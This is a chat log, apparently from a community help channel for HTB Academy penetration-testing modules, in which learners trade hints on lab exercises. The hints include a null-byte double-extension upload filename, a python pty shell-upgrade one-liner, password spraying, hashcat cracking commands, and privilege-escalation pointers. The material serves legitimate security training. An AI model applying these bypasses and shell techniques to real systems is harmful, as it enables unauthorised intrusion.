#modules
I have completed that module not too long ago. What are u having problem with ?
Hey! I'm stuck on Footprinting Lab - Medium, any hint is needed, please.
Did nmap for all the ports, found out the services, but all of them are under credentials that I don't have
maybe -v is what you are looking for?
the only thing that is possibly available is a mount that I should mount through NFS, but in turn I get the mount with no access at all, because of nobody owner
leaving me with no clue on what to do next
Has anyone completed the 'Using Web Proxies' module? I am attempting to use the ZAP HUD on the browser to search for a high level vulnerability and exploit it to read the /flag.txt file. The HUD will not respond to commands, and I'm only getting Medium level alerts from running active scan. Need some guidance please.
use Spider and then use Active Scan to get the alert you are looking for. You can also stop the Active Scan once you have found the alert
read again the exercise and the hint! Once you decoded the cookie you need to do the same in reverse with the payload options
any help with the Windows Local Privesc module
I'm on the skills assessment and having trouble after the foothold
Anyone wanna gift me the AD modules
@topaz lantern TYVM I will try that out.
@swift cove I just did this last night, if you keep having trouble let me know and I'll help, but not giving away answers
@topaz lantern Ran spider, now running Active Scan, I'm sensing that this will take awhile to run all the way through, is that correct?
not needed to have it completed, around 45% should show you the Alert. PM if you like for more hints haha also remember to increase the speed of the scanner
Can anyone provide me a nudge on File Upload Attacks, skills assessment?
So far I have managed to:
||Upload .svg images and get the source code for:
upload.php and common-functions.php||
Get past the blacklisting for sure, could be I passed the whitelisting and got stuck in the MIME Type / Content-Type, or did not even pass the whitelisting as the error for these two is the same: "Only images are allowed"
Can anyone give a nudge with the skill assessments on common web application 1 with the exploit step? Or with part 2 with the wordpress url (got the rest of part 2 done)
Could I have some help with the File Upload skill assessment? I am able to upload a malicious file but I am having problems finding where the upload directory is
Oh lol we are on the same problem
@naive ravine Fuzz for extensions. Use a double extension. Make sure you have the correct Mime type AND Content type.
@raven cairn try using XXE to read the page source code , it will reveal the upload directory as well as how the file is renamed
@rustic sage feel free to DM me about Footprinting
Can I have help with how the file is renamed in the file upload skill assessment? I am having trouble deciphering the php
Dm
Hi everyone, I'm new, I'm not good at all in this field, please... Is there anyone who can teach me?
The modules are structured in such a way that you can teach yourself the content through self-study. Afterwards, you can put what you have learned into practice.
If you get stuck somewhere, ask here for help. You will surely find help.
Shout out to whoever wrote the "Learning Process" module. I'm getting a lot out of it, especially the "Learning pyramid".
Yes, I got it, thanks. DM if you need help.
Hi All with regards to my earlier request on File Upload Skills Assessment, I managed to upload a payload using the ||fuzzed double extension: sh.php\x00.jpeg||
However, I cannot find the file when I try to navigate to it from the URL:
Can someone give me nudge in the right direction?
DM me.
I don't have notes on it, but I can try to help. DM.
Could someone please help me with the question in AD Enumeration & Attacks - Skills Assessment Part II: Use a common method to obtain weak credentials for another user?
Did you find the answer? I'm stuck on the same question. Do you have any advice?
I've tried password spraying and credential enumeration, but the privs of the user are very limited so I can't perform most enumeration with PowerView, cme, etc.
@lament crag DM me
@idle kestrel try utilizing the techniques shown in the "internal password spraying from windows" section
Thank you and I gave that a shot, but the username auto detection doesn't work. I created a list of valid usernames from the /opt/jsmith.txt file, but still no dice. Any more hints?
Could someone point me in the right direction on SQLMap Essentials module? I am super stuck right now
dm
Hello, could someone help me (a slight nudge)? I am a bit confused by the SSRF section in the Web Service & API attacks
would doing all the modules in academy from tier 0 - tier 2 make me a decent pen tester?
or is it not enough
to become a decent pen tester you will have to dedicate years
#giveaways
Were absolute or relative sequence numbers used during the capture? (see question-1.zip to answer)
INTRO TO NETWORK TRAFFIC ANALYSIS
Tcpdump Fundamentals
Hints?
Find and submit the contents of the TXT record as the answer. Been at this too long, getting nothing. Can I get some help with the correct command please?
dm
im currently working through the shells & payloads module
and i cannot stay connected to anything. VPN connection shows no problems , but when i'm RDP into windows box it crashes and dies for 10 minutes and cant log back in
same exact thing happened on previous quest/part
for linux box where it took me 30 minutes of logging in with correct credentials to establish bind shell
is there general problems with this section and these boxes. Really frustrating taking 10x as long to do something bc it wont stay connected (i'm hardlined/ internets fine on my end)
Just do it and you'll find your answer
I also have this issue sometimes. Try again tomorrow, I felt it's a bit random. Often it just works fine
Have you tried dig ?
Yes mate, a few different variations of it. No idea what I'm missing now!
DM me
Hi all anyone up for a nudge on File Upload Skills assessment?
dm
what are you stuck on?
Hello mates, did anyone complete the "ATTACKING WEB APPLICATIONS WITH FFUF" module? I'm stuck on parameter fuzzing, can anyone help me please !!
write me in DM
Anyone that could give me a nudge in the right direction with the Command Injections skill assessment? i have a general idea of what i should be doing but im hitting a wall
@lethal latch DM me
@idle kestrel Did you make any changes to the DomainPasswordSpray.ps1 file? I had to edit it slightly to make it run, there was an error on a certain line of the script
Am I still able to view a module and read it after I finish it?
Hello guys! I am super new and stuck in the first module. In http module I did curl inlanefreight.com curl-O inlanefreight.com/download.php and did ls and cat download.pho but could not find flag. Is there any chance can you help me to find my mistake
Yes, thanks! Problem was my username enumeration was wrong. I needed to target the DC instead of using a /opt/jsmith.txt. There's a bug though where enum4linux will fail when requesting a user list. I had to enumerate all to get the user list.
d
Hi, someone may help me for this question : "Find the percentage of users with a path to Domain Admin. Submit just the number as your answer (to two decimal points, i.e. 9.78)." (Module - BloodHound Skill assessments)
hello, could use a some help with shells & payloads module section on live engagement if possible
working on the server-side attacks module on the first SSTI Exploitation Example, where would the environment variables normally be found if i have RCE on the box already?
EDIT: nvm im just a linux noob,
although i do need help installing tplmap, the installation instructions in this module did not work and im not sure why
can anyone provided me some direction with Weak Bruteforce Protections question 2: Work on webapp at URL /question2/ and try to bypass the login form using one of the method showed. What is the flag? Please dm me. I think I know what needs to be done but I cant seem to get it to work
Good evening or other day period folks!
would doing all the modules in academy from tier 0 - tier 2 make me able to do some htb boxes?
i need some help with lfi module skill assessment. I have found the panel and im trying to poison the access log but it just won't give me the cmd result
help
I've completed the basic toolset path, am at 74% completion on jr pentester path (of what is available for now) and 82% of the bug bounty one, took lots of notes, watched a lot of ippsec videos on yt (taking notes) and completed the getting started section of htb. I say I can get something going on a box, but not yet at the point I can complete one without help or hints. Not close at all, but sooooo much closer than I could've imagined months ago!
hallo
how long has all of this took you
@simple merlin DM me
hey, I was wondering if you've had some luck with this. I'm stuck on this question and I'm not sure how to proceed
Can anyone give me a hint about the wordpress url in common web application skill assessment part 2? Answered all of the other questions but I'm missing how I am supposed to find this url.
hey guys can u help me plz
i can not solve this question
Broken Authentication Bruteforcing Passwords
i use this regex for rockyou-50.txt
grep '[[:upper:]]' /usr/share/seclists/Passwords/Leaked-Databases/rockyou-50.txt | grep '[[:lower:]]' | grep '[[:digit:]]' | grep -E '^.{3,20}$'
A couple of months (3-4) actively except workdays. But I had a head start with Linux since I use Linux as my only OS for years. Also took a free (was lucky for a giveaway) udemy on WiFi hacking. Cracked htb last year (1-2 months), took a break and started back in early April.
Hi. From Introduction to Networking, Subnetting part, Q (broadcast address of the following CIDR: 10.200.20.0/27): what is the correct answer? I tried but it did not work.
I'm doing the login Brute Forcing skills assessments "Website", Brute forcing the admin page, what wordlist did you guys use?
is it not .31?
Anyone able to give me a nudge on the Active Subdomain Enumeration module FQDN for 10.10.34.136 ?
I am doing os corporate recon module section Email Addresses, and I do not get emails gathered from theharvester.py, also harvester does not support the source netcraft anymore? I think I need help.
How much pwnbox usage do you get if you buy 50 cubes? Says you get to use it but doesn't say how many times or how long for, compared to say a month sub which is unlimited
if anyone has done the server side attacks skill assessment and could give me a little help i would appreciate it
yeah that's right, it's 31. I'm puzzled by CIDR, can I DM you for the remaining two more
@devout cliff have you viewed the page source to find the javascript function?
yep i see the jsquery and have decoded the vars
@west canopy just not sure after i get those and 'fix' them what im supposed to do. im reading the jquery.js and see its doing some function to them to make another var but im not sure what its doing exactly
DM me
if you're still having trouble
sure
@west canopy I know I bug you a lot, just want to make sure I'm on the right track. Can I DM you about the brute force skills assessment?
@novel echo sure
HTB Academy - Broken authentication > Predictable Reset Token (first question). I am trying to find the token with a modified script and I feel like everything is as it should be, but somehow I get nothing after those 2000 iterations. I may be making some mistakes when selecting/converting the timestamp into epoch? Not sure what I am missing... Can anyone please help me and give me a nudge in the right direction? DM me?
not yet lol, i just skipped to a different module. whenever im stuck i come back to it in like a week and will always wonder how I got stuck in the first place
Still need help Footprinting - SMB - last question
ive walked through everything and cannot for the life of me understand what the fuck its supposed to be
for full path
/etc/samba/?
like idk
HTB Academy / Connexion Bruteforcing / last question
i got a pb with the wordlist idk which one i got to use cause it tells me 145h both so idk if i got the good one or not can someone help me on this i'm blocked since 2 days on this ...
@west canopy
@rustic sage
@versed zealot plzz buddy can you help me
I am going crazy in the module Password Attacks - Skills Assessment Hard
I have a foothold with 2 users credentials on the server. Got a vhd file that I tried to decrypt with no success. Do I need to try harder on this file or on other things on the server?
any hint on module Attacking Common Services section Attacking Email Services i got the username (and the mail i think) i try brute force every service on that box but no luck i don't know what to do next
dm
any hint on the FQDN of 10.10.34.136 from the Active Subdomain Enumeration part? Im still not sure how to get the information of the different zone. nevermind, just found it
dm
Hello everyone! Need some hint for question in Nessus Skills Assessment
of VULNERABILITY ASSESSMENT module. Question is: " What were the targets for the authenticated scan?" I dont get it. What I should to find?
Solved. Nevermind..
Hi
whats up bro
Hello all, I have a problem when installing Parrot OS on VMware and on Vultr. For some reason when I follow all the steps laid out in the HTB academy it won't reach the login screen. And will go straight back to the try/install screen. How can I solve this?
OK tonight is the night. I need help to complete the last assignments of both broken authentication and attacking common applications. Anyone?
Still stuck?
There are no modules on Academy that have bruteforcing taking longer than 5 mins (maybe except in password attacks). DM me, we'll figure it out.
still need help / push /hint on Footprinting - SMB last question
at a loss for how im supposed to find the file path for it
Are you allowed to post write ups on module skill assessments?
@low vine Try connecting with rpcclient and enumerating from there
I had tried connecting to rpcclient for hours
and literally 5 mins ago i finally was able to connect
so infuriating to waste so much time on that
I might be able to help
My hero! I'll DM
lol
Wordpress module, exploiting a vulnerable plugin: Is it normal doing exactly the same exploit from the module, but getting nothing? When I manually access the file count_of_send.php, I get some warnings and nothing using ?pl=/etc/passwd (it just hangs).
@sweet heron What you're describing matches what I have in my notes so I think it should be working
getting no luck with the rce too... weird.
Warning: system(): Cannot execute a blank command in /usr/src/wordpress/wp-content/themes/twentynineteen/404.php on line 2
nevermind. xD
So it's a bug? Same path, target is accessible. It hangs for a while and then shows a timeout error. Curl just hangs forever.
can I ask for some direction for the final assessment in module of "Web Attacks" please? I have got info from IDO, but cant login with that piece of info
It ended up working on my host, but not on my kali machine... weird.
Sure where are you stuck. Can also DM.
thanks, will DM you now
Hey guys. Can anyone help me in the skill assessments of windows fundamentals? I'm trying to create a security group (saw that as AD) and all the commands are not recognised in the machine, thinking I'm wrong in one of them.
can someone help me with the metasploit fundamentals problem where we have to exploit the older version of sudo?
if anyone is available to answer a question about the broken authentication module let me know
why limit yourself? Would you build a house with just a screwdriver?
Dm if you still need help
Go to the port 5000 website and you will see the name of the application! or look at the Http-title of this port. then look for this name in the MSF.
Hey Guys, Im doing the File Upload Attack Assessment but i have trouble to find the upload directory
any hints?
hello everyone, who has made USING WEB PROXIES module?
i think i have that assessment done, dm me
Bruteforce module, Skills Assessment does someone knows if the list that we have to make with cupp is about Harry Potter or Daniel Radcliffe ??
dm
I'm following this image setup but can't capture responses traffic, any clue | hint why can be?, this is related to Web Proxies module..!!!
Hi guys, just started and I'm doing the Web Requests (HTTP Headers) atm, the question is asking for the flag, I believe and I found it but can't submit it correctly, any ideas what I'm doing wrong?
which task and question is this for?
HTTP Headers in the Web Requests
The server above loads the flag after the page is loaded. Use the Network tab in the browser devtools to see what requests are made by the page, and find the request to the flag.
could you send a (spoilered) screenshot of your question/issue?
That's fine to post here or do I DM?
man it should be fine
im new to this server too though so im not too sure
but ive already completed that section
just yesterday in fact
yeah man youre doing another module ive got no clue on that one
All good, thanks anyways
Does anyone know how to find this exploit in Metasploit CVE-2018-15473?
have msfconsole running
type command 'search cve:2018-15473'
type command 'info 0'
@quaint marsh
Thx
Hello, need help with shell&payloads module section assesment, "Exploit the blog site and establish a shell session with the target OS. Submit the contents of /customscripts/flag.txt" I have a payload on exploit-db to use but its not present in msfconsole. Does this need to be added manually to pwnbox?
pls dm me if anyone can assist me here
when using burp intruder, if i need to find a .html file in the admin directory is this correct way to structure the pointer
If you need to find a directory or file inside of the admin directory, it would be GET /admin/$$.html
Obviously, the $$ stands for your two pointers.
ohhh i see what you mean thanks !
Sure thing.
Hey - anyone had issues with the bloodhound module? Doesn't like the example zip files that are provided for the questions
@fading raptor yep, I think the version of bloodhound on my VM was not compatible with their bloodhound data they provide. I had to use Pwnbox
Rightio! Thanks man, I'll get on the pwnbox
Any one do the Linux Privilege escalation Academy module? Could use some help on the final skill assessment. Stuck on getting flag 4.
@wheat garden sorry if this is a silly question but have you nmapped the target?
new to discord chat here thanks for this this tip has allowed me to continue the skills assesment if I get stuck again ill be back on here
saw a past tip you gave its allowed me to continue
I established a vpn connection inside my vm but I cannot ssh to the target, it works fine on the pwnbox in the browser tho? anyone has a quick fix?
did you have to get a private key?
attempting to get wine installed are parrot and I'm getting this error winehq-devel : Depends: wine-devel (= 7.9~bullseye-1)
E: Unable to correct problems, you have held broken packages.
The "get vpn key" in the target box? @rich pumice
yeah, you might have to log in like this: "ssh -i "path to key" your_vpn-admin@ip"
@west canopy got the 4th flag in Linux privilege escalation module. Did a search on the whole system as the tomcat user and didnt even see 5th flag. But attempted privilege escalation of netcat shell using the gtfo busctl though that appears to not be working for me. Used a metasploit module too to get a shell though still unsure how to leverage busctl command as root to gain privileged access. Unsure what to do from here.
@wheat garden the gtfo busctl is the right path, try and upgrade your shell first. python -c 'import pty;pty.spawn("/bin/bash")'
Hi guys im in the part of jobs of metasploit and i need to see which exploits the target is vulnerable
How do i know which exploits the target is vuln?
Thank you, 5th flag gotten, though will note for me python -c 'import pty;pty.spawn("/bin/bash")' did not work, had to use python3: "python3 -c 'import pty;pty.spawn("/bin/bash")'"
nice work
can you help me?
@rustic sage I think you'd want to background your meterpreter session and run the local exploit suggester
Not sure which section / question you are on though
Metasploit, Sessions & Jobs
thank you appreciate your help
so how do i make it?
Did you ever find the answer to this? I found the GET request in the devtools and found the text file, but the flag within the file is not rendering. Thanks
DM if you would like to go through it. You will kick yourself
hi guys, i'm having a problem with Information Gathering - Web - Skills Assessment, in question 3 "Perform active infrastructure identification against the host https://i.imgur.com. What server name is returned for the host?".
I've already tried doing all the commands to find the nameserver, but both nslookup and dig find nothing, and i.imgur.com returns the response code 302.
imgur.com also returns four server names (none of the four is the answer), but they all seem to return Transfer failed when I run the dig command for AXFR records, and the https://hackertarget.com/zone-transfer/ site also returns Transfer failed for the four servernames as well
Could anyone give me any hints as to what I would be doing wrong? or if there is a problem with the question itself
did you end up working this one out?
@tight mesa I found if you set these Interception Rules for the client and server responses, You will see the HTML response in the HTTP history tab of Burp.. Then if you refresh the web request to the page in Firefox with Interception turned on.. In Burp, Right click anywhere in the request --> Do intercept --> Response to the request --> Then the HTML will be reflected in the request, then you can manipulate it.
I'm stuck on the AD Enumeration & Attacks - Skills Assessment Part II. I have an open xp_commandshell, but I don't know what to do next. What section of the course should I look at to move forward?
hello, i'm having a hard time on this question : Which ACE entry can be leveraged to perform a targeted Kerberoasting attack? | on AD enumeration and attacks course.
what the f
just got correct answer idk what did I change
Hi, I am doing skill assessments-web proxy and I am struggling with it. I only got the flag for the second question. Please come to my rescue
dm
Hey, i'm just wondering if anyone can give me a hand i'm on the Privilege escalation part of "getting started" and i have the id_rsa file on my attacker box and used chmod 600 on the file but when i try and ssh with -i id_rsa it says
"load key "id_rsa": invalid format"
Any clues?
Make sure you leave an empty line at the very end of the key
after the -----END PRIVATE KEY-----
oh
i just realised
i didn't copy the "START OF KEY" "END OF KEY" stuff
just the code inbetween
lmfao i took too long and the target expired so have to do it again
got it! Thanks dude!

You get things sorted with Karti? Really simple mistake, was definitely kicking myself when I found it.
Module AD enum & exploitation
question What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)
I cannot find the commands to find the answer
bg or background
Bonjour everyone. For those who finished the shells & payloads, were you able to connect to Nomachine via the attackbox?
The latency is real bad and it keeps disconnecting
Is it possible, after Intruder is finished, to filter the results and save the working payloads?
in burp
DNS lookups are a form of passive recon. Passive recon basically means collecting info on an org while not connecting to their infrastructure. The question states to perform active infrastructure recon against the host, so go to the host and look at more than the response code
Hey all, anyone available for some help with the skills assessment on Web Service and API attacks? I don't understand how to read the SOAP and use it to find an SQLi...
dm
Hi guys ! I have a question about "cracking common hashes" part of the hashcat module ?
You'd better ask it directly
I'm on pwnbox and my hashcat constantly get "exhausted" but he doesn't test all the possibility... Why is it happening ?
what's your command?
hashcat -a 0 -m 1000 hash rockyou.txt -r /usr/share/hashcat/rules/best64.rule
looks good to me... what section of the module?
cracking common hashes
I just tried with another rule file and I cracked the hash....
What is weird is when I launch my hashcat even without rule file I get an exhausted in like 5sec...
In previous modules everything was working fine, I didn't get any exhausted before...
I remember having a similar problem, but don't remember what was the problem. Your hash is between ' ' ? It's indeed an NTLM, so this part is ok. The files are accessible (tab command completes well?)
My hash is written in a file, but he is not between '' in the file. That can be a problem ?
Yes all files are accessible
try it straight in your command between single quotes maybe?
Nope, didn't work, I always have this exhausted... But if I use the correct rule file I crack the hash (because hashcat finds the password before it gets exhausted)
When I launch without rules hashcat get exhausted after 5s but if I put a rule file he is exhausted within 30s and 1min30
I'm launching my command in root can it be the problem ?
can we see a screenshot of the hashcat exhausted? Is rejected is at 100% or 0?
Well, it looks like the command did work properly. Password is not in rockyou (and I confirmed). Try a smaller rockyou (like the 50 one) with rules. As long as it doesn't reject them all, it means the command worked.
Okay, I wasn't believing he did the whole rockyou in 4s, that surprised me
I just tried on one of my vm and my vm is as fast as the pwnbox, I thought that was way slower, my bad !
with my GTX 1070, it takes 2 seconds. Exhausted just means it didn't find the password. I thought the problem was it instantly rejected all possibilities. I didn't find the password either with best64 rules. Use generated.rule, you will find it.
Yep, I got it ! Thanks for your help !
It depends on the hash you are cracking. Some are faster than others.
I am stuck on the NSE portion of the NMAP enumeration module. I have tried several different attempts to enumerate the flag. Can I get a nudge?
dmed
what is the command to execute?
@summer canopy DM me
anyone got any idea how to scp files to the pwnbox on academy? when i connect to vpn with my vm, it gives me the same IP address as the Pwnbox so i cant scp. however the module says i must scp in order to progress as bloodhound is broken
@fading raptor if i have to transfer files to pwnbox i will just use my google drive or something like ufile.io
Hey, can someone help me a little with the module Web Attacks (Skills assessment section)?
Sure, you can DM.
anyone around that can help with linux basics module?
@sudden ocean i can try! which section / question?
system information, having issues figuring out the path for mail and network interface
im super new to all this lol, i appreciate the help
try running the command: env
this will show your environment variables and should include the path to htb-student's mail
for the network interface try the command: ifconfig
basically the linux equivalent of ipconfig in windows
see i dont even know what ipconfig is lol,
i believe i found my answers though thank you!
hi, Skills Assessment - SQL Injection Fundamentals -> Where is the security flaw? In the form or elsewhere?
I can't seem to execute the LD_PRELOAD priv esc from Linux privilege escalation, shared libraries section.
Use the full path to the shared object?
OpenSSL idk, maybe say start instead of restart if it's not running currently
I'm dumb. Yes, thanks!
lord these modules, maybe someone can help me w/ Active Subdomain Enumeration part of Info Gathering. I'm trying to get the FQDN for the ip addresses. I think I have the 2 zone transfers but i'm still having issues
sigh i really hate asking such a noobish thing..... but I'm working on Linux Fundamentals (yes, im THAT new).....but I've been getting stuck on sections like Service and Process management. I feel like I'm.....just missing key concepts....but it's not been discussed before. Also.....my pwnbox keeps asking for a password when I try to engage commands like "systemctl start ssh."
I'm at a loss at this point. I can su to root, or sudo my way out of it, but password? did i miss something in my own interface? Feel free to DM if you dont want to embarrass me publicly heh.
What is Pwnbox? How does it work? Read about it here.
Control+F to "randomly generated user password". Right after that is a graphic that shows how to access the password
I never would have known. Thanks tremendously!
np
No, not yet. I'm still at a loss.
Hi, I was wondering if anyone could point me to the right direction for the "Broken Authentication" module - "Weak Bruteforce Authentication" q: "Work on webapp at URL /question2/ and try to bypass the login form using one of the method showed. What is the flag?". To my understanding, I am meant to use curl, with the "X-Forwarded-For" header, but I can't seem to get it to work.
Hey, did you manage to get this?
Hi all, anyone able to give me an assist on the active directory module, specifically the part about windows enumeration living-off-the-land. The second question is "What domain user is explicitly listed as a member of the local Administrators group on the target host?" - any hints as to how I can find this?
Never mind, I figured it out
I'm being stuck at Command Injection - Skill Assessments. I've already found which parameter to inject malicious code but final payload is a tough task. Anyone give me a nudge
?
hi, Skills Assessment - SQL Injection Fundamentals -> Where is the security flaw? In the form or elsewhere?
Nevermind, I've just got the flag. I've completed all bug bounty path, should we take CBBH exam?
hi all. Anyone can provide hints for password attack - Credential Hunting in Linux question? I don't understand the hint (Sometimes, we will not have any initial credentials available, and as the last step, we will need to bruteforce the credentials to available services to get access. From other hosts on the network, our colleagues were able to identify the user "Kira", who in most cases had SSH access to other systems with the password "LoveYou1". We have already provided a prepared list of passwords in the "Resources" section for simplicity's purpose.)
The password provided in resources has loveyou - so I created custom wordlist (hashcat --force -a6 password.list ?d --stdout) to generate custom wordlist with number ; then realize LoveYou so I generate another one using toggle2 rules - but it seems I'm going to wrong direction because it's not related to the credential hunting in linux?)
Hey, can i have help on the Locations questions in the OSINT: Corporate Recon Module ? i got the good cities and use the right search engine but didnt got the good 4 digits
dm
Are SMTP password brute forcing times reasonable in "Attacking Common Services" - "Attacking email services"?
Never mind. Brute forcing times are quite low if you know what to do.
everything seems to be simple there. scan ports. then you look for an exploit in Metasploit for services on port. you launch it. you turn off the Meterpreter using the BG command. Well and further you raise privileges.
@blissful verge any guestimate as to when the pivoting and tunneling academy module will release?
Hey Guys,
Can someone give me a hand on AD Enum Skills assessment part II ?
I'm here : Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.
I've got a shell but I can't write on disk so I'm not sure how I can elevate privileges
Hi, I would like to have ideas for one of the questions in module "Command Injection - Advanced Command Obfuscation"
I have used the intended way( i guess) to find the answer as well as unintended way, both of them are lead to the same result. But when I submitted it, it was incorrect
can anyone give me some ideas please?
dm
any hint on how to get the flag in module Attacking Common Services Skills Assessment hard i got the user with the admin privileges
what is the best way to crack wp-user passwords?
hello, could someone give me a little hint of the last exercise of the ssti module?
Is it necessary to use AJP proxy?
DM me
how to connect to web interface in Vulnerability Assessment-Nessus Skills Assessment?
Port 80 is closed. but given credentials! through RDP?
nessus is on port 8834
web interface Nessus?
Why Authenticate to 10.129.245.120 with user "htb-student" and password "HTB_@cademy_student!"
yes
Navigate to the web interface at the end of this section and log in with the provided credentials.
Once logged in, perform a BASIC NETWORK SCAN (modify the scan template to scan ALL ports, leave all other options the same) against the target: 172.16.16.100
some kind of nonsense!
They give you one IP and ask you to scan a completely different one!?
Are you Pass this module?
yes
in this task you don't need to scan there are scan result you can just use that to Answer the question
Hi guys! I am newbie. I recently started taking the WordPress module and reached the Skills Assessment. And right from the start, I had a problem. The test questions are related to wordpress and the module itself is also dedicated to it, but when I try to scan the target with wpscan, I get an error that the site exists but it does not use wordpress. When looking at the source code of the main page, I also did not find evidence that it uses wordpress. Also, I tried to check the main wordpress directory and got a 404 error. Can someone tell me if this is right and I need to search solution or it's some kind of bug?
Hey all, in Information Gathering - Web Edition, question # 2:
Which CMS is used on app.inlanefreight.local? (Format: word)
The answer is obvious but the website will not accept my answer, anyone encounter this?
Nevermind, I needed an ! to complete the answer.
hi, anyone who can give me a hint about how to find the other directories on "Repeating Request" under Web Proxies module
did you find all the answers?
yes
I went through pwnbox to the site https://10.129.100.169:8834 on nessus. there is already a completed scanning report. I took the answers from it. besides this: What is the plugin ID of the highest criticality vulnerability for the Windows authenticated scan?
Where to look for it?
hi, anyone who can give me a hint about how to find the other directories on "Repeating Request" under Web Proxies module, I tried using wfuzz but is not resolving the IP_Add:Port_ID
Created a report in http format by module. got a number there.
sorry i didn't see the message in the Windows authenticated just click in the darkest red (critical vuln) and copy the plugin ID on top
if my student academy sub runs out will i still have access to the modules that I have completed?
@pliant summit yep
OpenVAS ready?
?
if your question is have i done that then the answer is yes
Hello, can someone help me for "Skills Assessment - File Inclusion" ?
anyone who had made "Using Web Proxy" module..!!!
Still stuck? @tight mesa you too?
setting up proxy chains, I set the proxy list to http 127.0.0.1 8080 and https 127.0.0.1 8080
but when I run curl with the proxychain it says its invalid?
This is intended. Keep looking around the target
if I only set proxy chains with http and not https, then it will fail to connect to the server, but I can still ping the server
Alright, so looked like when i opened zap it was set to port 8081, but burp is set to 8080 and that will allow it to work, but still can't get https
Limited File Uploads, is it broken? The Upload bar is gone:
Thanks! I'll try
Hey guys any help finding the web application running its part of skills assesment on Using Metasploit
hey in introduction to active directory module, guided lab part 1, am I creating a new group for the new hires in the first task or am I adding them to an existing one?
Hey hey someone i can DM for a sanity check on File Upload Attack assessment ?
||check the first picture: it show which app and the version in the comment||
DM me
thanks!
Any help on File Upload attacks: Skill Assessment, where am I supposed to get the info where the file gets uploaded?
dm
@sweet heron i figured it out thanks
Has anyone completed the AD Enumeration and Attacks Module?
Hi im stuck with sqlmap essentials case 10 any hint ??
You have generated a mut_password.list use it, feel free to DM if you need more hints
looking for a nudge on skill assessment Broken Authentication, please DM
Hey guys, anyone who finished Web Attacks - Skills Assessment that could give me a hand?
Hello, did you get help with skill assessment for broken authentication? I'm stuck and could use some advice if you have completed it. tyvm
Hi, I don't understand what I need to do at Attacking Common Services, Attacking RDP. I assume it is something like RDP Hijacking, but I cannot find any other RDP user..
dm
aga sa
hi@all...:)..
i have questions about DNS zones....if i did a request (with dig or nslookup) how can i identify how many zones exists? i hope the question is understandable...:/...
if you can't do a zone transfer that it's often the case you need to do enumeration with tools and wordlists
hmm...okay...
Hey Guys, im struggling with the File Upload Attack Skill Assessment. I have couple of working File extensions, Content types and File Signatures but im not able to find the right combination.
any hints?
Hello, is anyone doing the AD Enumeration and Attacks Module?
dm
@plush falcon i've completed it, do you need help?
Yes, can I dm you?
sure
Looking for help on the Kerberoasting from Linux portion of AD enum and attacks module
anyone any good with webrequests? im stuck on the POST one
I hacked all the boxes
On the Zap fuzzer tutorial page, I found the flag, but it's saying it is wrong?
hey anyone who can successfully done the "proxying tools" section from using web proxies module
I'm doing what is described in the section with no success
and I'm not sure what can I doing wrong
That message usually means you're using the wrong mode in hashcat
Hi, Im working on Attacking Common Applications - Skill Assessment 1
I've tried several exploits but they don't seem to work and the manager console is not accessible on the vulnerable app
Could I get some direction?
nvm i got it bc i tried harder
@west canopy
Anyone finished the HTTP Headers flag request, using the Network tab in the browser devtools to see what requests are made? I can't seem to find it. So either there is an issue or I am blind. Need a bit of nudge, thanks.
Hey everyone, I'm stuck on Module 18. I'm able to SSH in, but it's not accepting my password.
Hello, i have question about SSRF from Server Side attack.
How do we know to refer to the file
internal_local.py and how do we know we are referencing internal.app.local?
I did this, but I would like to know where it came from
Hello, I'm stuck on USING WEB PROXIES: Burp Intruder.
I get answer by using ffuf. But when I start attack with Burp, I get 408 response even if URL is correct.
Can somebody help me?
Hy, Target machine is not accessing using SSH , Timed out, what's the reason?
or when i use port number it's say connection is closed.
Hello someone have a minute? i have problem with SSRF in Server side module
Did you check if the machine is still up? Sometimes you run out of time to use them
I did every thing, reload page , close and again sign in into academy.
So just did the Web Service & API Attacks Skills Assessment, but completed it in a different way to how you are supposed to. Would love a nudge on how to complete it properly!??? Can anyone assist?
SOB!!! I just realized I wasn't connected to the VPN
has anyone done kerberoasting from linux?
im stuck like this nothing happens. Any ideas?
then says connection timed out
what module is that from?
attacking active directory
i have not done that module but i have seen that used in a ctf event before. I wonder if you need the ip part.
i would think if the domain is in your /etc/hosts that you would not need to specify it
im using their attack box
Any one do windows privilege escalation module? Actually very early in the module section "communicating with processes".
For last question on that section seems I need to run a command accesschk.exe though it doesnt appear that its installed on the windows VM provided.
@wheat garden check the directory C:\Tools\
Gracias senor. Yes running .\accesschk64.exe in that directory worked.
Is it possible to have a full url encoding in fuzz ? The url encode does not do the same thing
Identify one of the non-standard update services running on the host. Submit the full name of the service executable (not the DisplayName) as your answer.
I know the answer but I'm trying to figure out how to get it.
It says to use powershell but up until this point. I've used bash to RDP and SMBclient.
What am i missing? Can anyone explain the steps to get this answer for me?
Hi! I'm back with a question for the Skills Assessment - WordPress. When I got the target, there was a site without WordPress. After searching for information on it, I went to a site with the domain www.inlanefreight.com/ and checked it. And with the help of wpscan and in meta name="generator" I determined the version 5.6.8 Also, through the theme file, I got the theme version. But both answers are wrong. Am I trying to check the wrong resource again? There, in the links, there was also a link to blog.inlanefreight.local. Maybe you need to check it out? But the task is about public-facing a website. And if I understand correctly, blog.inlanefreight.local is only accessible over the local network.
Sorry if I'm asking stupid questions. I'm just new to this area.
I also found in one of the files in the accessible directory an entry similar to those that usually contain the HTB {Publ1c_D0cum3nt5_C@n_L3ak_Inf0} flag, but it also did not fit any of the questions
Yup, you should be using the .local version of the site. You might need to add both to your /etc/hosts
Thank you!
Can i encode strings in Kali Linux on the shell with a special command?
@leaden quail yes you can do base64 encoding by piping into the base64 command , and for url encoding there is the urlencode command
Hello, I am stuck on the 'Using the Metasploit Framework' module, specifically the section 'Introduction to Metasploit'.
The question is "Which version of Metasploit is free and can be used only through a CLI?" and the answer is, obviously (or so I think), as described earlier in the module, Metasploit Framework. However, this answer does not seem to be accepted by the answer box.
I have tried pretty much every variation I can think of, such as 'Framework', 'framework', 'metasploit framework', 'community', etc., to no avail
I hope I am not missing something incredibly obvious -- does anyone know the correct answer?
@fringe wedge try msfconsole
Hahah wow, that is the last thing I would have thought of... Thank you!
np!
I am doing the GET Web Request Exercise, where I need to use browser devtools to see what is the request it is sending when we search. Shouldn't there be a 'search.php' under the file column?
@iron plaza i think we would have to actually navigate to /search.php
I did that with the curl and got the flag but based on what you said the question seems misleading: "Use the browser devtools to see what is the request it is sending when we search"
I think it's because the browser devtools doesn't actually Fuzz for web content. Like we could visit a website and there might be a login.php page, or a contact.php page, but those would not show up unless we navigated to them directly (if that makes sense).
Thanks, as frustrating as it is you learn something new.
